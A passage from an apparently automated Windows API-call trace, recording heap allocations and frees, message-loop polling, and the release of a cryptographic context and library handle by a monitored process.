hHeap=0x970000) returned 1 [0246.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.532] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0246.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0246.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0246.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0246.532] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0246.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0246.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.532] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0246.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d18 | out: hHeap=0x970000) returned 1 [0246.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.533] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0246.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0246.533] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0246.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0246.533] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0246.533] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.533] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0246.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0246.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.533] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.533] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0246.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0246.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0246.534] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.534] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55bc8 | out: hHeap=0x970000) returned 1 [0246.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0246.534] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0246.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f48 | out: hHeap=0x970000) returned 1 [0246.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.535] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0246.535] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0246.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0246.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.535] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0246.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0246.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0246.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.535] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0246.536] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0246.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.536] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0246.536] FreeLibrary (hLibModule=0x756e0000) returned 1 [0246.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0246.536] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0246.536] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0246.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.536] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0246.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0246.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0246.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0246.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0246.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0246.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0246.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.537] CloseHandle (hObject=0x2d0) returned 1 [0246.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0246.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0246.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0246.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0246.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0246.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0246.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0246.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0246.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0246.542] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0246.542] TranslateMessage (lpMsg=0x8cf708) returned 0 [0246.542] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0246.542] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0246.542] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0246.542] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0246.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0246.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0246.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0246.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0246.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0246.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.543] CloseHandle (hObject=0x2a0) returned 1 [0246.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0246.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0246.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0246.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0246.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0246.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0246.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0246.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0246.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0246.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0246.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0246.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0246.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c38 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0246.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: 